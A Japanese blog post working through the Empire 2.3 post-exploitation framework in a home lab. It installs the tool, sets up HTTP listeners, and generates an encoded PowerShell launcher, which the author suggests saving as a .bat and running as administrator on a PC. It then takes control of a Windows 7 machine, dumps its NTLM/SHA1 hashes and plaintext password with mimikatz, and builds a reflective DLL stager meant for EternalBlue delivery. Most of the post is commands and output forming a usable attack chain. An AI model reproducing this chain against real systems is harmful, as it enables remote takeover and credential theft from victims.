皇帝 version2.3 を触ってみる

EMPIREはPowerShell2.0で作成されたエクスプロイトを作成できる、ペンテストフレームワーク。
例のファイルレスマルウェアもEMPIREが利用されたとの噂。

より高度な「ファイルレス活動」を実現した一連のマルウェアを確認 

インストールしてみる。

root@kali:~# git clone https://github.com/EmpireProject/Empire
Cloning into 'Empire'...
remote: Counting objects: 9204, done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 9204 (delta 8), reused 11 (delta 5), pack-reused 9189
Receiving objects: 100% (9204/9204), 19.18 MiB | 124.00 KiB/s, done.
Resolving deltas: 100% (6153/6153), done.
root@kali:~# cd Empire/
root@kali:~/Empire# ls
LICENSE  README.md  changelog  data  empire  lib  setup
root@kali:~/Empire# cd setup/
root@kali:~/Empire/setup# ls
cert.sh  install.sh  reset.sh  setup_database.py
root@kali:~/Empire/setup# ./install.sh 

最後にパスワードを入力してセットアップ完了。起動してみる。

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.3 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       282 modules currently loaded

       0 listeners currently active

       0 agents currently active

 

282個のツールが使えるとの事。

リスナーモードにして、httpにて待ち受ける。

 

(Empire) > listeners
[!] No listeners currently active 
(Empire: listeners) > uselistener http
(Empire: listeners/http) > help

Listener Commands
=================
agents            Jump to the agents menu.
back              Go back a menu.
creds             Display/return credentials from the database.
execute           Execute the given listener module.
exit              Exit Empire.
help              Displays the help menu.
info              Display listener module options.
launcher          Generate an initial launcher for this listener.
listeners         Jump to the listeners menu.
main              Go back to the main menu.
resource          Read and execute a list of Empire commands from a file.
set               Set a listener option.
unset             Unset a listener option.
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://10.0.2.15:80              Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        7b24afc8bc80e548d66c4e7ff72171c5 Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        80                               Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php

metasploitっぽくてgood!!

名前とportを変更し、実行。

(Empire: listeners/http) > set Name n-lab
(Empire: listeners/http) > set port 8080
[!] Invalid option specified.
(Empire: listeners/http) > set Port 8080  ※"P"は大文字
(Empire: listeners/http) > execute
[*] Starting listener 'n-lab'
[+] Listener successfully started!

を作成

(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc  SQBmACgAJ・・・・・・・・

生成された文字列は何回もエンコードされていそう。powershellマルウェアの弱点といったところか。

文字列をbatとして保存。後はどこかのPCで管理者として実行する。

(Empire: listeners/http) > [+] Initial agent T8BASEF9 from 10.0.2.6 now active (Slack)
(Empire: listeners/http) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  T8BASEF9        ps    10.0.2.6        IE10WIN7        *IE10WIN7\IEUser    powershell/2876     5/0.0    2017-12-23 11:05:51

(Empire: agents) > interact T8BASEF9
Empire: T8BASEF9) > sysinfo
(Empire: T8BASEF9) > sysinfo: 0|http://10.0.2.15:8080|IE10WIN7|IEUser|IE10WIN7|10.0.2.6|Microsoft Windows 7 Enterprise |True|powershell|2876|powershell|2

Listener:         http://10.0.2.15:8080
Internal IP:    10.0.2.6
Username:         IE10WIN7\IEUser
Hostname:       IE10WIN7
OS:               Microsoft Windows 7 Enterprise 
High Integrity:   1
Process Name:     powershell
Process ID:       2876
Language:         powershell
Language Version: 2

 

パスワードを取得してみる

(Empire: K3YGDTVF) > mimikatz
(Empire: K3YGDTVF) > 
Job started: YRN96H

Hostname: IE10Win7 / S-1-5-21-3463664321-2923530833-3546627382

  .#####.   mimikatz 2.1 (x86) built on Dec 11 2016 18:01:05
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 87244 (00000000:000154cc)
Session           : Interactive from 1
User Name         : IEUser
Domain            : IE10WIN7
Logon Server      : IE10WIN7
Logon Time        : 2017/12/23 9:52:08
SID               : S-1-5-21-3463664321-2923530833-3546627382-1000
  msv :	
   [00000003] Primary
   * Username : IEUser
   * Domain   : IE10WIN7
   * NTLM     : fc525c9683e8fe067095ba2ddc971889
   * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
   [00010000] CredentialKeys
   * NTLM     : fc525c9683e8fe067095ba2ddc971889
   * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
  tspkg :	
  wdigest :	
   * Username : IEUser
   * Domain   : IE10WIN7
   * Password : Passw0rd!

ふむふむ。Eternalblueでぶち込む際に使用するdllを作成する。

(Empire: listeners/http) > main

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.3 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       282 modules currently loaded

       1 listeners currently active

       0 agents currently active


(Empire) > listeners

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  n-lab             http            http://10.0.2.15:8080                5/0.0                      


(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name n-lab2
(Empire: listeners/http) > set DefaultJitter 0.5
(Empire: listeners/http) > set DefaultDelay 10
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > execute
[*] Starting listener 'n-lab2'
[+] Listener successfully started!

(Empire: listeners/http) > listeners

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  n-lab2            http            http://10.0.2.15:80                  10/0.5                     
  n-lab             http            http://10.0.2.15:8080                5/0.0                      

(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > options

Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to use.
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                 powershell code, uses the
                                                 ObfuscateCommand for obfuscation types.
                                                 For powershell only.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  Language         True        powershell        Language of the stager to generate.
  OutFile          True        /tmp/launcher.dll File to output dll to.
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Arch             True        x64               Architecture of the .dll to generate
                                                 (x64 or x86).
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                 Only used if Obfuscate switch is True.
                                                 For powershell only.
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/dll) > set Arch x86
(Empire: stager/windows/dll) > set Listener n-lab2
(Empire: stager/windows/dll) > set StagerRetries 10
(Empire: stager/windows/dll) > execute

[*] Stager output written out to: /tmp/launcher.dll

 

長くなったので、次回!